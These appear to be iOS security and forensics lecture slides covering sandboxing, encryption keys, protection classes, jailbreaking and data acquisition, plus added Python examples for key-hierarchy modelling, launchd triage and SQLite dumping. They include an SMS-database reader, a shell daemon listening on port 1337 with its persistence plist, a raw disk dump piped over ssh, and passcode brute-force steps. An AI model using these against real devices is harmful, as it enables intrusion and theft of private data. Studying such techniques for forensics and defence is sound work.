iOS Security and Forensics

Apple's Security Model
- iDevice applications are distributed through the App Store
- Tested, analyzed, approved, signed and then distributed by Apple's services
- Installed in:
  /private/var/mobile/Applications/{Unique_App_ID}
- Full list of installed applications:
  /private/var/mobile/Library/Caches/com.apple.mobile.installation.plist
- Executed as the "mobile" user inside the TrustedBSD sandbox
- ASLR and DEP enabled
- All of this on a fully encrypted filesystem

Apple's Directories Sandboxing

TrustedBSD Sandbox
- Open source project for FreeBSD systems (the TrustedBSD MAC framework)
- Sponsored by Apple, Google, Yahoo!, NSA...
- Modified and used by Apple for OS X and iOS
- Installs a series of hooks that intercept and filter syscalls
- The policy is read from a human-readable file, compiled, and passed to the kernel in a binary format
- The kernel then installs the sandbox rules for the process

Policy rules
- Stored in /usr/share/sandbox and hardcoded in the kernel
- Some policy decisions are delegated to the user through popups
- Written in SBPL, a Scheme-like, human-readable syntax:

    (version 1)
    (allow default)
    (deny file-read-data (regex #"^/private/tmp/test\.c$"))

- Running a shell under that policy (the profile text is in $POLICY):

    $ sandbox-exec -p "$POLICY" /bin/sh
    $ file /private/tmp/test.c
    test.c: cannot open: Operation not permitted

- Running a shell under one of the named, built-in profiles:

    $ sandbox-exec -n no-internet /bin/sh
    $ ping 4.2.2.2
    ping: sendto: Operation not permitted

- sandbox_init() is a libsandbox.dylib function (not a syscall itself): it compiles the policy into the binary format and hands it to the kernel
iDevice Storage Device
The NAND storage device is laid out as follows:
- BOOT (block 0): contains the bootloader
- PLOG (block 1): contains the EMF, BAG1 and Dkey
  - EMF: used to encrypt the entire filesystem and the HFS journal
  - BAG1: used to encrypt the keybag
  - Dkey: used to encrypt files that have no encryption policy class
- NVM (blocks 2-7): stores the NVRAM parameters
- FIRM (blocks 8-15): stores the firmware, iBoot, device tree and logos
- FSYS (blocks 16-4084): stores the encrypted filesystem
- RSRV (last 15 blocks): reserved

Encryption mechanism
Starting with the iPhone 3GS, Apple devices contain a hardware encryption engine. It provides the following:
- UID key stored in the processor (not readable by software; it can only be used through the AES engine)
- 0x835 and 0x89B keys derived from the UID key
- Filesystem:
  - Data partition encrypted with the EMF key (AES-128)
  - System partition encrypted with a hardcoded AES-256 key (present in the kernel and bootloaders)
  - Keychain database encrypted with the Dkey
- The keybag contains the master keys of the Protection Classes
  - some master keys are additionally encrypted with the passcode
- Each file on the filesystem is encrypted with its own "cprotect" key
- Each "cprotect" key is encrypted (wrapped) with the master key of the file's Protection Class
- At boot, the EMF and the Dkey are extracted automatically

Protection Classes
Whether a file can be decrypted at a given moment depends on its Protection Class.
Protection Classes used for files:
- NSFileProtectionComplete: the file is only decryptable while the iDevice is unlocked
- NSFileProtectionCompleteUnlessOpen: the file is only decryptable while the iDevice is unlocked, but stays readable after locking if the application keeps it open
- NSFileProtectionCompleteUntilFirstUserAuthentication: the file is decryptable after the first successful unlock and remains so until the next reboot
- NSFileProtectionNone: the file is decrypted with the Dkey, i.e. readable whenever the device is booted
- NSFileProtectionRecovery: undocumented
Protection Classes used for keychain items:
- kSecAttrAccessibleWhenUnlocked[ThisDeviceOnly]
- kSecAttrAccessibleAfterFirstUnlock[ThisDeviceOnly]
- kSecAttrAccessibleAlways[ThisDeviceOnly]
(items in a ThisDeviceOnly class are never migrated to another device through a backup)

Data wiping and recovery
- Wiping the filesystem consists of rewriting the EMF and the Dkey: the data blocks stay on the flash but can no longer be decrypted
- Deleting a file consists of rewriting its associated cprotect
- The filesystem's journal:
  - is encrypted with the EMF key, like the rest of the partition
  - contains cprotect keys in cleartext
  - rotates depending on filesystem activity
  - can be retrieved and used to recover deleted files, since only the cprotect was rewritten and the data blocks are still there
- Raw dump of the data partition (/dev/disk0s1s2) or of the whole flash device:
  - connect the iDevice to a power supply
  - disable auto-lock
  - run:
    $ dd if=/dev/rdisk0 bs=4k | ssh -C username@computer_ip 'dd of=/home/$USER/dump.dmg'
  - wait... for... a... while...

Security chain

Jailbreak
- Execution of third-party applications/code allowed
- Unsigned code execution granted (depending on the jailbreak)
- Complete bypass of the sandbox
- Root (/) partition mounted read/write
- Before jailbreak:
    $ cat /etc/fstab
    /dev/disk0s1 /            hfs ro 0 1
    /dev/disk2s1 /private/var hfs rw 0 2
- After jailbreak:
    $ cat /etc/fstab
    /dev/disk0s1 /            hfs rw 0 1
    /dev/disk2s1 /private/var hfs rw 0 2
Note: on iOS >= 5, /dev/disk2s1 became /dev/disk1s2

Useful information
- launchd: first binary executed while booting (init-like)
- watchdog: checks whether a process has been running in memory for more than 5 minutes and, if so, reboots the iDevice (which is why a ramdisk has to disable it)
- launchctl: used to control daemons
    $ launchctl load com.adel.reverse_shell.plist
- ldid: Link Identity Editor, used to (pseudo-)sign a binary so that a jailbroken device accepts it
    $ ldid -S my_binary
- usbmux: protocol created to multiplex TCP connections over USB; optimized for and used by iTunes
- Xcode: development platform on Mac OS X, freely downloadable from the Mac App Store
- Cydia Store: unofficial online application store for jailbroken devices
- SSH binaries: freely available as a package on the Cydia store
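The key hierarchy from the Encryption mechanism, Protection Classes and Data wiping slides above, as an added example (this is not Apple's code and not from the slides). Everything cryptographic is a stand-in so that it runs with the standard library alone: an HMAC-SHA256 counter keystream replaces AES and AES key wrap, and the passcode key is plain PBKDF2, whereas on a real device that derivation is entangled with the UID key inside the AES engine (which is why passcode cracking has to run on the device, as the ramdisk slides describe). The names Device, write/read/delete/recover_from_journal/wipe and brute_force are this example's own; only the structure (passcode -> class master keys -> per-file cprotect keys, Dkey for NSFileProtectionNone, everything under EMF, cprotect copies in the journal) is what the slides state.

```python
"""Toy model of iOS data protection as described on the slides (added example,
not Apple's code). Stand-ins: HMAC keystream instead of AES/AES key wrap,
plain PBKDF2 instead of the UID-entangled passcode derivation."""
import hashlib
import hmac
import os

COMPLETE = "NSFileProtectionComplete"
UNTIL_AUTH = "NSFileProtectionCompleteUntilFirstUserAuthentication"
NONE = "NSFileProtectionNone"


def xcrypt(key: bytes, data: bytes) -> bytes:
    """Toy symmetric stream cipher; the same call encrypts and decrypts."""
    stream = b"".join(hmac.new(key, i.to_bytes(4, "big"), hashlib.sha256).digest()
                      for i in range(len(data) // 32 + 1))
    return bytes(a ^ b for a, b in zip(data, stream))


def wrap(kek: bytes, key: bytes) -> bytes:
    """Toy key wrap: ciphertext plus an 8-byte tag so a wrong KEK is detected."""
    ct = xcrypt(kek, key)
    return ct + hmac.new(kek, ct, hashlib.sha256).digest()[:8]


def unwrap(kek: bytes, blob: bytes):
    ct, tag = blob[:-8], blob[-8:]
    ok = hmac.compare_digest(hmac.new(kek, ct, hashlib.sha256).digest()[:8], tag)
    return xcrypt(kek, ct) if ok else None


def passcode_key(passcode: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", passcode.encode(), salt, 200, 32)


class Device:
    """PLOG keys (EMF, Dkey), the keybag, the files and the HFS journal."""

    def __init__(self, passcode: str):
        self.emf = os.urandom(32)       # the whole data partition sits under this key
        self.dkey = os.urandom(32)      # class key for NSFileProtectionNone
        self.salt = os.urandom(16)
        pk = passcode_key(passcode, self.salt)
        # keybag: class master keys, stored wrapped with the passcode key
        self.keybag = {c: wrap(pk, os.urandom(32)) for c in (COMPLETE, UNTIL_AUTH)}
        self.available = {}             # class -> unwrapped key currently in memory
        self.journal = []               # (name, cprotect) pairs written recently
        self.files = {}                 # name -> (class, cprotect on disk, data on disk)

    def unlock(self, passcode: str) -> bool:
        pk = passcode_key(passcode, self.salt)
        keys = {c: unwrap(pk, b) for c, b in self.keybag.items()}
        if None in keys.values():
            return False
        self.available = keys
        return True

    def lock(self) -> None:     # Complete is purged; UntilFirstUserAuthentication survives
        self.available.pop(COMPLETE, None)

    def reboot(self) -> None:
        self.available = {}

    def class_key(self, cls: str):
        return self.dkey if cls == NONE else self.available.get(cls)

    def write(self, name: str, cls: str, data: bytes) -> None:
        ck = self.class_key(cls)
        if ck is None:
            raise PermissionError(f"class key for {cls} not available")
        fk = os.urandom(32)             # per-file cprotect key
        cprotect = wrap(ck, fk)
        self.journal.append((name, cprotect))   # the journal keeps a copy of the cprotect
        self.files[name] = (cls, xcrypt(self.emf, cprotect), xcrypt(self.emf, xcrypt(fk, data)))

    def read(self, name: str):
        cls, cp, blob = self.files[name]
        ck = self.class_key(cls)
        if self.emf is None or ck is None:
            return None
        fk = unwrap(ck, xcrypt(self.emf, cp))
        return None if fk is None else xcrypt(fk, xcrypt(self.emf, blob))

    def delete(self, name: str) -> None:
        """Slide: deletion rewrites the cprotect; the data blocks stay on flash."""
        cls, cp, blob = self.files[name]
        self.files[name] = (cls, xcrypt(self.emf, bytes(len(cp))), blob)

    def recover_from_journal(self, name: str):
        """Put the journal's copy of the cprotect back, then read the file again."""
        for n, cprotect in reversed(self.journal):
            if n == name:
                cls, _, blob = self.files[name]
                self.files[name] = (cls, xcrypt(self.emf, cprotect), blob)
                return self.read(name)
        return None

    def wipe(self) -> None:
        """Slide: a wipe rewrites EMF and Dkey; every block becomes undecryptable."""
        self.emf = None
        self.dkey = None


def brute_force(dev: Device, digits: int = 4, limit: int = 10 ** 4):
    """Try PINs in order; with 10^4 candidates only the KDF cost bounds the search."""
    for i in range(min(limit, 10 ** digits)):
        pin = f"{i:0{digits}d}"
        if dev.unlock(pin):
            return pin
    return None
```

Walking a Device through lock, reboot, a wrong passcode, a 4-digit brute force, a deletion recovered from the journal and finally a wipe reproduces every statement on the slides: a Complete-class file goes dark at lock, an UntilFirstUserAuthentication file only at reboot, a None-class file never (until the wipe destroys the Dkey and EMF).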
HelloWorld for iDevice
- Simple HelloWorld program:

    $ cat helloworld.c
    #include <stdio.h>

    int main(int argc, char *argv[])
    {
        printf("HelloWorld\n");
        return 0;
    }

- Cross-compile it with the iPhoneOS SDK toolchain:

    $ export PF=/Developer/Platforms/iPhoneOS.platform
    $ $PF/Developer/usr/bin/arm-apple-darwin10-llvm-gcc-4.2 -o hello helloworld.c -isysroot $PF/Developer/SDKs/iPhoneOS5.0.sdk/

- Binary (pseudo-)signing:

    $ ldid -S hello

- Simple binary transfer over SSH:

    $ scp hello root@<iDevice_IP_Addr>:/usr/bin/my_binary

Local File Disclosure
Copies the SMS database to stdout; the original skipped the fopen() check and used a feof() loop, which prints one stray byte at the end:

    $ cat lfi_smsdb.c
    #include <stdio.h>

    int main(void)
    {
        FILE *fp = fopen("/var/mobile/Library/SMS/sms.db", "r");
        int c;

        if (fp == NULL) {
            perror("fopen");
            return 1;
        }
        /* copy the database byte by byte; feof() only becomes true after a
           failed read, so test the return value of fgetc() instead */
        while ((c = fgetc(fp)) != EOF)
            putchar(c);
        fclose(fp);
        return 0;
    }

Reverse Shell
The program only execs a shell; the socket comes from launchd (see Process Daemonizing below), so strictly speaking this is a bind shell on a listening port rather than a reverse shell:

    $ cat reverse_shell.c
    #include <unistd.h>

    int main(void)
    {
        char *argv[] = { "/bin/sh", NULL };

        /* passing a NULL argv, as the original did, is undefined in POSIX */
        execve("/bin/sh", argv, NULL);
        return 1;   /* only reached if execve() failed */
    }

Process Daemonizing
- Copy reverse_shell to /usr/bin on the iDevice
- Copy com.adel.reverse_shell.plist to /System/Library/LaunchDaemons/ on the iDevice
- Reboot the iDevice, or:
    $ cd /System/Library/LaunchDaemons
    $ launchctl load ./com.adel.reverse_shell.plist

plist Manifest Format
- XML file format, used for configuration purposes
- The daemon's manifest (the Sockets dictionary makes launchd listen on TCP port 1337 on the daemon's behalf):

    $ cd /System/Library/LaunchDaemons
    $ cat com.adel.reverse_shell.plist
    <?xml version="1.0" encoding="UTF-8"?>
    <plist version="1.0">
    ...
    <key>Label</key>
    <string>com.adel.reverse_shell</string>
    <key>Program</key>
    <string>/usr/bin/reverse_shell</string>
    <key>Sockets</key>
    <dict>
        <key>Listeners</key>
        <dict>
            <key>SockServiceName</key>
            <string>1337</string>
        </dict>
    </dict>
    ...
    </plist>

- Caveat: a Sockets entry on its own only makes launchd own the listening socket. For /bin/sh to talk to the incoming connection, launchd must hand the accepted socket over as the daemon's stdin/stdout/stderr (the inetdCompatibility dictionary with Wait set to true); otherwise the program has to check in with launchd to retrieve the listening descriptor itself.

Physical Access Pwnage
Many possibilities:
- Easy: the iDevice has no passcode
  - Full access to the data through SpringBoard, SSH, or after booting on a ramdisk
- Medium: the iDevice has a simple 4-digit passcode
  - Boot on a ramdisk, patch the kernel and crack the passcode
  - Needs at most 30 minutes of passcode cracking (10^4 possibilities)
- Medium++: the iDevice has a passcode longer than 4 digits, or an alphanumeric one
  - Cracking could take a long time
  - The xkcd $5 wrench shall be used!
- Hard: the iDevice has a boot passcode (EMF + Dkey encrypted with it)
  - Does such a thing even exist?

LiveCD vs RAMDISK
- A 2 MB HFS+ container with:
  - a customized launchd
  - binaries to copy/execute
  - plist files
- Loaded onto the iDevice over USB after a reboot into DFU mode:
  - exploit the iDevice's vulnerability
  - load the ramdisk into RAM
  - execute launchd
  - disable the watchdog
  - option 1:
    - scan and mount the filesystem (EMF + Dkey extracted automatically)
    - copy files from the filesystem
    - chroot into the mounted filesystem
  - option 2:
    - initialize the usbmux protocol
    - read and send the raw NAND data over USB (EMF + Dkey must be extracted manually)

Sensitive Data
- Keyboard cache
- Clipboard buffer
- Consolidated GPS positions database and latest GPS position
- Application and Safari snapshot cache
- Google Maps cache and history
- Address book, photos, songs, voice recordings, notes, calendar, call history
- SMS, MMS, drafts and Spotlight SMS cache
- Geolocation tags on photos
- Safari cache, search list, bookmarks, cookies, history and WebKit cache
- Installed applications list
- Emails, applications, their data and caches
- Last dialed number, bookmarked contact list, IMSI, ICCID
- Configured access point list
...

Keyboard Cache
- Contains the keyboard cache: typed words, known and unknown
- One cache per language
- Available in /private/var/mobile/Library/Keyboard/
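The LaunchDaemons persistence from the Process Daemonizing and plist Manifest Format slides above, seen from both sides, as an added example (not from the slides, not Apple's code): it builds the manifest with plistlib and then triages a LaunchDaemons directory for manifests that ask launchd to open a socket, which is what a responder would look for on a device suspected of carrying such a daemon. The inetdCompatibility/Wait entry is an assumption about the part of the manifest the slides elide; the function names and the benign sample manifest are this example's own.

```python
"""launchd manifest: build it, and scan a LaunchDaemons directory for network
listeners. Added example (not from the slides). plistlib is stdlib and reads
both the XML and the binary plist flavour found on devices."""
import os
import plistlib
import tempfile


def reverse_shell_manifest() -> dict:
    """The slides' manifest; inetdCompatibility is assumed, not on the slides."""
    return {
        "Label": "com.adel.reverse_shell",
        "Program": "/usr/bin/reverse_shell",
        "Sockets": {"Listeners": {"SockServiceName": "1337"}},
        # launchd accept()s and hands the connection to the program as stdio
        "inetdCompatibility": {"Wait": True},
    }


def write_manifest(path: str, manifest: dict) -> None:
    with open(path, "wb") as f:
        plistlib.dump(manifest, f)          # XML plist, as on the slides


def roundtrip_binary(manifest: dict) -> dict:
    """Devices often hold binary plists; plistlib parses them the same way."""
    return plistlib.loads(plistlib.dumps(manifest, fmt=plistlib.FMT_BINARY))


def listening_daemons(directory: str) -> list:
    """(label, program, [service names]) for every manifest with a Sockets key."""
    found = []
    for name in sorted(os.listdir(directory)):
        if not name.endswith(".plist"):
            continue
        with open(os.path.join(directory, name), "rb") as f:
            try:
                m = plistlib.load(f)
            except plistlib.InvalidFileException:
                continue                    # not a plist at all: worth a look, but skip here
        services = []
        for entry in (m.get("Sockets") or {}).values():
            # launchd.plist(5): each value is a dict or an array of dicts
            for s in (entry if isinstance(entry, list) else [entry]):
                services.append(str(s.get("SockServiceName", "?")))
        if services:
            program = m.get("Program") or (m.get("ProgramArguments") or ["?"])[0]
            found.append((m.get("Label"), program, services))
    return found


def demo_scan() -> list:
    """Constructed LaunchDaemons directory: the slides' daemon next to a benign one."""
    with tempfile.TemporaryDirectory() as d:
        write_manifest(os.path.join(d, "com.adel.reverse_shell.plist"),
                       reverse_shell_manifest())
        write_manifest(os.path.join(d, "com.example.benign.plist"),
                       {"Label": "com.example.benign",
                        "ProgramArguments": ["/usr/bin/true"], "RunAtLoad": True})
        with open(os.path.join(d, "README"), "w") as f:
            f.write("not a plist\n")
        return listening_daemons(d)


if __name__ == "__main__":
    for label, program, services in demo_scan():
        print(f"{label}: {program} listens on {', '.join(services)}")
```

On a real dump the same scan runs over /System/Library/LaunchDaemons (and /Library/LaunchDaemons on jailbroken devices); a Program outside /usr/libexec or /usr/sbin with a Sockets entry is the thing to chase.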
Applications snapshot
Available in:
  /private/var/mobile/Library/Caches/Snapshots/{APP_NAME}/{NAME}.jpg

Consolidated GPS Positions Database
Available in:
  /private/var/root/Library/Caches/locationd/consolidated.db

End. Questions?
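Most of the artefacts listed on the Sensitive Data slide, including the sms.db read by the Local File Disclosure program and the consolidated.db shown above, are SQLite databases. The dumper below is an added example (not from the slides or any forensic tool): it learns the tables from sqlite_master instead of hardcoding a schema that changes between iOS versions, opens the evidence read-only, and converts Apple's 2001-based timestamps. The sample database and its column names are constructed for the example and are not the real sms.db or consolidated.db schema; the nanosecond heuristic in apple_time() is an assumption.

```python
"""Schema-agnostic dumper for SQLite forensic artefacts (added example)."""
import os
import sqlite3
import tempfile
from datetime import datetime, timedelta, timezone

APPLE_EPOCH = datetime(2001, 1, 1, tzinfo=timezone.utc)


def apple_time(value: float) -> datetime:
    """CFAbsoluteTime: seconds since 2001-01-01 UTC. Some newer tables store
    nanoseconds; assumption: anything beyond 1e11 is such a value."""
    if value > 1e11:
        value /= 1e9
    return APPLE_EPOCH + timedelta(seconds=value)


def dump_sqlite(path: str) -> dict:
    """Return {table: {"columns": [...], "rows": [...]}} for every user table."""
    con = sqlite3.connect(f"file:{path}?mode=ro", uri=True)   # never write to evidence
    try:
        tables = [r[0] for r in con.execute(
            "SELECT name FROM sqlite_master WHERE type='table' "
            "AND name NOT LIKE 'sqlite_%' ORDER BY name")]
        out = {}
        for t in tables:
            q = t.replace('"', '""')        # names come from the file: quote them
            cols = [c[1] for c in con.execute(f'PRAGMA table_info("{q}")')]
            rows = con.execute(f'SELECT * FROM "{q}"').fetchall()
            out[t] = {"columns": cols, "rows": rows}
        return out
    finally:
        con.close()


def make_sample_db(path: str) -> None:
    """Constructed stand-in with made-up columns; the real files must be read
    as they are, which is exactly why dump_sqlite() assumes no schema."""
    con = sqlite3.connect(path)
    con.executescript("""
        CREATE TABLE message (ROWID INTEGER PRIMARY KEY, address TEXT,
                              date INTEGER, text TEXT);
        INSERT INTO message VALUES (1, '+15550001', 340000000, 'meet at 9');
        INSERT INTO message VALUES (2, '+15550002', 340003600, 'ok');
        CREATE TABLE CellLocation (LAC INTEGER, CI INTEGER, Timestamp REAL,
                                   Latitude REAL, Longitude REAL);
        INSERT INTO CellLocation VALUES (1234, 5678, 340000000.0, 48.86, 2.35);
    """)
    con.commit()
    con.close()


def sample_dump() -> dict:
    """Build the constructed sample in a temporary file and dump it."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "sample.db")
        make_sample_db(path)
        return dump_sqlite(path)


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else None
    for table, d in (dump_sqlite(target) if target else sample_dump()).items():
        print(f"== {table} ({len(d['rows'])} rows): {', '.join(d['columns'])}")
        for row in d["rows"]:
            print("  ", row)
```

Run it against a copy of the database (never the only copy, and together with any -wal/-journal file sitting next to it, since rows can still live only there); timestamp columns are then fed to apple_time() once the dump shows which ones they are.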